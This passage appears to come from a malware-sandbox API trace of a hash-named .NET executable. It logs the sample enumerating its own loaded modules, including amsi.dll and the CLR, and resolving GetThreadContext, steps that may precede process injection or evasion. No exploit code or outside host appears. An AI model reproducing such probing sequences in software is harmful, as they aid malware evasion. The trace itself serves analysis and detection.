GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75a40000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")) returned 0x1e [0167.408] GetModuleInformation (in: hProcess=0x2e4, hModule=0x758c0000, lpmodinfo=0x22c0604, cb=0xc | out: lpmodinfo=0x22c0604*(lpBaseOfDll=0x758c0000, SizeOfImage=0x44000, EntryPoint=0x758d9d80)) returned 1 [0167.408] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x758c0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0167.408] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x758c0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")) returned 0x1f [0167.409] GetModuleInformation (in: hProcess=0x2e4, hModule=0x75970000, lpmodinfo=0x22c275c, cb=0xc | out: lpmodinfo=0x22c275c*(lpBaseOfDll=0x75970000, SizeOfImage=0xad000, EntryPoint=0x75984f00)) returned 1 [0167.409] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75970000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0167.409] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75970000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\RPCRT4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")) returned 0x1e [0167.409] GetModuleInformation (in: hProcess=0x2e4, hModule=0x73e40000, lpmodinfo=0x22c4868, cb=0xc | out: lpmodinfo=0x22c4868*(lpBaseOfDll=0x73e40000, SizeOfImage=0x1e000, EntryPoint=0x73e4b640)) returned 1 [0167.410] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x73e40000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0167.410] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x73e40000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SspiCli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")) returned 0x1f [0167.410] GetModuleInformation (in: hProcess=0x2e4, hModule=0x73e30000, lpmodinfo=0x22c6974, cb=0xc | out: lpmodinfo=0x22c6974*(lpBaseOfDll=0x73e30000, SizeOfImage=0xa000, EntryPoint=0x73e32a00)) returned 1 [0167.411] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x73e30000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0167.411] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x73e30000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")) returned 0x21 [0167.411] GetModuleInformation (in: hProcess=0x2e4, hModule=0x77040000, lpmodinfo=0x22c8a88, cb=0xc | out: lpmodinfo=0x22c8a88*(lpBaseOfDll=0x77040000, SizeOfImage=0x58000, EntryPoint=0x770825c0)) returned 1 [0167.412] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x77040000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="bcryptPrimitives.dll") returned 0x14 [0167.412] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x77040000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")) returned 0x28 [0167.412] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c8d0000, lpmodinfo=0x22cabbc, cb=0xc | out: lpmodinfo=0x22cabbc*(lpBaseOfDll=0x6c8d0000, SizeOfImage=0x79000, EntryPoint=0x6c8df82a)) returned 1 [0167.413] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c8d0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="mscoreei.dll") returned 0xc [0167.413] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c8d0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")) returned 0x3a [0167.413] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74a00000, lpmodinfo=0x22ccd04, cb=0xc | out: lpmodinfo=0x22ccd04*(lpBaseOfDll=0x74a00000, SizeOfImage=0x45000, EntryPoint=0x74a1de90)) returned 1 [0167.414] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74a00000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0167.414] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74a00000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SHLWAPI.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")) returned 0x1f [0167.414] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74400000, lpmodinfo=0x22cee10, cb=0xc | out: lpmodinfo=0x22cee10*(lpBaseOfDll=0x74400000, SizeOfImage=0x1bd000, EntryPoint=0x744e2a10)) returned 1 [0167.415] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74400000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="combase.dll") returned 0xb [0167.415] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74400000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")) returned 0x1f [0167.416] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74a50000, lpmodinfo=0x22d0f1c, cb=0xc | out: lpmodinfo=0x22d0f1c*(lpBaseOfDll=0x74a50000, SizeOfImage=0x14f000, EntryPoint=0x74b06820)) returned 1 [0167.416] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74a50000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0167.416] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74a50000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\GDI32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")) returned 0x1d [0167.417] GetModuleInformation (in: hProcess=0x2e4, hModule=0x755c0000, lpmodinfo=0x22d30ac, cb=0xc | out: lpmodinfo=0x22d30ac*(lpBaseOfDll=0x755c0000, SizeOfImage=0x147000, EntryPoint=0x755d1cf0)) returned 1 [0167.417] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x755c0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0167.418] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x755c0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\USER32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")) returned 0x1e [0167.418] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74990000, lpmodinfo=0x22d51b8, cb=0xc | out: lpmodinfo=0x22d51b8*(lpBaseOfDll=0x74990000, SizeOfImage=0x2b000, EntryPoint=0x74995680)) returned 1 [0167.418] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74990000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0167.419] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74990000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\IMM32.DLL" (normalized: "c:\\windows\\syswow64\\imm32.dll")) returned 0x1d [0167.419] GetModuleInformation (in: hProcess=0x2e4, hModule=0x77030000, lpmodinfo=0x22d72bc, cb=0xc | out: lpmodinfo=0x22d72bc*(lpBaseOfDll=0x77030000, SizeOfImage=0xc000, EntryPoint=0x77033930)) returned 1 [0167.420] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x77030000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="kernel.appcore.dll") returned 0x12 [0167.420] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x77030000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")) returned 0x26 [0167.421] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6d310000, lpmodinfo=0x22d93e8, cb=0xc | out: lpmodinfo=0x22d93e8*(lpBaseOfDll=0x6d310000, SizeOfImage=0x8000, EntryPoint=0x6d3117b0)) returned 1 [0167.421] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6d310000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0167.422] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6d310000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\VERSION.dll" (normalized: "c:\\windows\\syswow64\\version.dll")) returned 0x1f [0167.422] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6b6f0000, lpmodinfo=0x22db4f4, cb=0xc | out: lpmodinfo=0x22db4f4*(lpBaseOfDll=0x6b6f0000, SizeOfImage=0x6b1000, EntryPoint=0x6b705d20)) returned 1 [0167.422] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6b6f0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="clr.dll") returned 0x7 [0167.423] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6b6f0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")) returned 0x35 [0167.423] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c650000, lpmodinfo=0x22dd624, cb=0xc | out: lpmodinfo=0x22dd624*(lpBaseOfDll=0x6c650000, SizeOfImage=0xf5000, EntryPoint=0x6c6a4160)) returned 1 [0167.424] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c650000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="MSVCR120_CLR0400.dll") returned 0x14 [0167.424] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c650000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSVCR120_CLR0400.dll" (normalized: "c:\\windows\\syswow64\\msvcr120_clr0400.dll")) returned 0x28 [0167.425] GetModuleInformation (in: hProcess=0x2e4, hModule=0x69850000, lpmodinfo=0x22df758, cb=0xc | out: lpmodinfo=0x22df758*(lpBaseOfDll=0x69850000, SizeOfImage=0x1228000, EntryPoint=0x0)) returned 1 [0167.425] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x69850000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="mscorlib.ni.dll") returned 0xf [0167.426] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x69850000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\8062d427acd64e37f4fded7b00f4a869\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\8062d427acd64e37f4fded7b00f4a869\\mscorlib.ni.dll")) returned 0x68 [0167.426] GetModuleInformation (in: hProcess=0x2e4, hModule=0x75360000, lpmodinfo=0x22e1900, cb=0xc | out: lpmodinfo=0x22e1900*(lpBaseOfDll=0x75360000, SizeOfImage=0xeb000, EntryPoint=0x7539d650)) returned 1 [0167.427] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75360000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0167.427] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75360000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")) returned 0x1d [0167.428] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6fef0000, lpmodinfo=0x22e3a04, cb=0xc | out: lpmodinfo=0x22e3a04*(lpBaseOfDll=0x6fef0000, SizeOfImage=0x75000, EntryPoint=0x6ff29a60)) returned 1 [0167.428] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6fef0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="uxtheme.dll") returned 0xb [0167.429] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6fef0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")) returned 0x1f [0167.430] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6f820000, lpmodinfo=0x22e5b10, cb=0xc | out: lpmodinfo=0x22e5b10*(lpBaseOfDll=0x6f820000, SizeOfImage=0x13000, EntryPoint=0x6f829950)) returned 1 [0167.430] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6f820000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0167.431] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6f820000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPTSP.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll")) returned 0x1f [0167.431] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6f7f0000, lpmodinfo=0x22e7c1c, cb=0xc | out: lpmodinfo=0x22e7c1c*(lpBaseOfDll=0x6f7f0000, SizeOfImage=0x2f000, EntryPoint=0x6f8095e0)) returned 1 [0167.432] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6f7f0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0167.432] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6f7f0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")) returned 0x1e [0167.433] GetModuleInformation (in: hProcess=0x2e4, hModule=0x73ae0000, lpmodinfo=0x22e9d28, cb=0xc | out: lpmodinfo=0x22e9d28*(lpBaseOfDll=0x73ae0000, SizeOfImage=0x1b000, EntryPoint=0x73ae9050)) returned 1 [0167.433] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x73ae0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="bcrypt.dll") returned 0xa [0167.434] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x73ae0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")) returned 0x1e [0167.435] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c850000, lpmodinfo=0x22ebe34, cb=0xc | out: lpmodinfo=0x22ebe34*(lpBaseOfDll=0x6c850000, SizeOfImage=0x7e000, EntryPoint=0x6c851140)) returned 1 [0167.435] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c850000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="clrjit.dll") returned 0xa [0167.436] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c850000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll")) returned 0x38 [0167.436] GetModuleInformation (in: hProcess=0x2e4, hModule=0x75b00000, lpmodinfo=0x22edf74, cb=0xc | out: lpmodinfo=0x22edf74*(lpBaseOfDll=0x75b00000, SizeOfImage=0x92000, EntryPoint=0x75b38cf0)) returned 1 [0167.437] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75b00000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0167.438] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75b00000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\OLEAUT32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")) returned 0x20 [0167.438] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6ad40000, lpmodinfo=0x22f0088, cb=0xc | out: lpmodinfo=0x22f0088*(lpBaseOfDll=0x6ad40000, SizeOfImage=0x9ac000, EntryPoint=0x0)) returned 1 [0167.439] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6ad40000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="System.ni.dll") returned 0xd [0167.439] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6ad40000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\cc4e5d110dd318e8b7d61a9ed184ab74\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\cc4e5d110dd318e8b7d61a9ed184ab74\\system.ni.dll")) returned 0x64 [0167.440] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c4c0000, lpmodinfo=0x22f2224, cb=0xc | out: lpmodinfo=0x22f2224*(lpBaseOfDll=0x6c4c0000, SizeOfImage=0x18d000, EntryPoint=0x0)) returned 1 [0167.441] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c4c0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="System.Drawing.ni.dll") returned 0x15 [0167.441] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c4c0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\9b645a48c9bcfc95aaadf6a069bb4ebe\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\9b645a48c9bcfc95aaadf6a069bb4ebe\\system.drawing.ni.dll")) returned 0x74 [0167.442] GetModuleInformation (in: hProcess=0x2e4, hModule=0x68bf0000, lpmodinfo=0x22f44fc, cb=0xc | out: lpmodinfo=0x22f44fc*(lpBaseOfDll=0x68bf0000, SizeOfImage=0xc59000, EntryPoint=0x0)) returned 1 [0167.443] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x68bf0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="System.Windows.Forms.ni.dll") returned 0x1b [0167.443] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x68bf0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\8cd2187094ba6cade0ca0fab4f932654\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\8cd2187094ba6cade0ca0fab4f932654\\system.windows.forms.ni.dll")) returned 0x80 [0167.444] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c7b0000, lpmodinfo=0x22f66ec, cb=0xc | out: lpmodinfo=0x22f66ec*(lpBaseOfDll=0x6c7b0000, SizeOfImage=0x92000, EntryPoint=0x6c7bdd60)) returned 1 [0167.445] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c7b0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="comctl32.dll") returned 0xc [0167.445] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c7b0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll")) returned 0x78 [0167.446] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6f730000, lpmodinfo=0x22f88b0, cb=0xc | out: lpmodinfo=0x22f88b0*(lpBaseOfDll=0x6f730000, SizeOfImage=0x1d000, EntryPoint=0x6f733b10)) returned 1 [0167.447] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6f730000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="dwmapi.dll") returned 0xa [0167.447] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6f730000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll")) returned 0x1e [0167.448] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c3f0000, lpmodinfo=0x22fa9bc, cb=0xc | out: lpmodinfo=0x22fa9bc*(lpBaseOfDll=0x6c3f0000, SizeOfImage=0xc5000, EntryPoint=0x0)) returned 1 [0167.449] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c3f0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="System.Runtime.Remoting.ni.dll") returned 0x1e [0167.450] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c3f0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Runt73a1fc9d#\\8d483c399064a7bdd1f920630af5a265\\System.Runtime.Remoting.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.runt73a1fc9d#\\8d483c399064a7bdd1f920630af5a265\\system.runtime.remoting.ni.dll")) returned 0x83 [0167.450] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6d300000, lpmodinfo=0x22fcbb8, cb=0xc | out: lpmodinfo=0x22fcbb8*(lpBaseOfDll=0x6d300000, SizeOfImage=0xd000, EntryPoint=0x6d3063e0)) returned 1 [0167.451] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6d300000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="amsi.dll") returned 0x8 [0167.452] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6d300000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll")) returned 0x1c [0167.452] GetModuleInformation (in: hProcess=0x2e4, hModule=0x684d0000, lpmodinfo=0x22fecbc, cb=0xc | out: lpmodinfo=0x22fecbc*(lpBaseOfDll=0x684d0000, SizeOfImage=0x712000, EntryPoint=0x0)) returned 1 [0167.453] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x684d0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="System.Core.ni.dll") returned 0x12 [0167.454] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x684d0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\abad45b9cc652ba7e38c4c837234c0ab\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\abad45b9cc652ba7e38c4c837234c0ab\\system.core.ni.dll")) returned 0x6e [0167.455] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74920000, lpmodinfo=0x2300e78, cb=0xc | out: lpmodinfo=0x2300e78*(lpBaseOfDll=0x74920000, SizeOfImage=0x6000, EntryPoint=0x74921460)) returned 1 [0167.455] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74920000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="psapi.dll") returned 0x9 [0167.456] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74920000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")) returned 0x1d [0167.457] CloseHandle (hObject=0x2e4) returned 1 [0167.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetThreadContext", cchWideChar=16, lpMultiByteStr=0x19cb70, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThreadContextMÚd", lpUsedDefaultChar=0x0) returned 16 [0167.457] GetProcAddress (hModule=0x74610000, lpProcName="GetThreadContext") returned 0x7462ec60 [0167.459] GetCurrentProcessId () returned 0x1318 [0167.459] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1318) returned 0x2e4 [0167.459] EnumProcessModules (in: hProcess=0x2e4, lphModule=0x2303930, cb=0x100, lpcbNeeded=0x19cb68 | out: lphModule=0x2303930, lpcbNeeded=0x19cb68) returned 1 [0167.460] GetModuleInformation (in: hProcess=0x2e4, hModule=0x400000, lpmodinfo=0x2303a70, cb=0xc | out: lpmodinfo=0x2303a70*(lpBaseOfDll=0x400000, SizeOfImage=0x76000, EntryPoint=0x0)) returned 1 [0167.460] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x400000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe") returned 0x44 [0167.460] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x400000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe")) returned 0x62 [0167.460] GetModuleInformation (in: hProcess=0x2e4, hModule=0x77110000, lpmodinfo=0x2305c94, cb=0xc | out: lpmodinfo=0x2305c94*(lpBaseOfDll=0x77110000, SizeOfImage=0x17b000, EntryPoint=0x0)) returned 1 [0167.460] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x77110000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0167.461] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x77110000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")) returned 0x1d [0167.461] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6d320000, lpmodinfo=0x2307d98, cb=0xc | out: lpmodinfo=0x2307d98*(lpBaseOfDll=0x6d320000, SizeOfImage=0x59000, EntryPoint=0x6d330780)) returned 1 [0167.461] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6d320000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="MSCOREE.DLL") returned 0xb [0167.461] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6d320000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSCOREE.DLL" (normalized: "c:\\windows\\syswow64\\mscoree.dll")) returned 0x1f [0167.461] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74610000, lpmodinfo=0x2309ea4, cb=0xc | out: lpmodinfo=0x2309ea4*(lpBaseOfDll=0x74610000, SizeOfImage=0xe0000, EntryPoint=0x74623980)) returned 1 [0167.461] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74610000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="KERNEL32.dll") returned 0xc [0167.462] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74610000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNEL32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")) returned 0x20 [0167.462] GetModuleInformation (in: hProcess=0x2e4, hModule=0x75710000, lpmodinfo=0x230bfb8, cb=0xc | out: lpmodinfo=0x230bfb8*(lpBaseOfDll=0x75710000, SizeOfImage=0x17e000, EntryPoint=0x757c1b90)) returned 1 [0167.462] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75710000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0167.462] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75710000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNELBASE.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")) returned 0x22 [0167.463] GetModuleInformation (in: hProcess=0x2e4, hModule=0x73d90000, lpmodinfo=0x230e100, cb=0xc | out: lpmodinfo=0x230e100*(lpBaseOfDll=0x73d90000, SizeOfImage=0x92000, EntryPoint=0x73dd0380)) returned 1 [0167.463] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x73d90000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="apphelp.dll") returned 0xb [0167.463] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x73d90000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\apphelp.dll" (normalized: 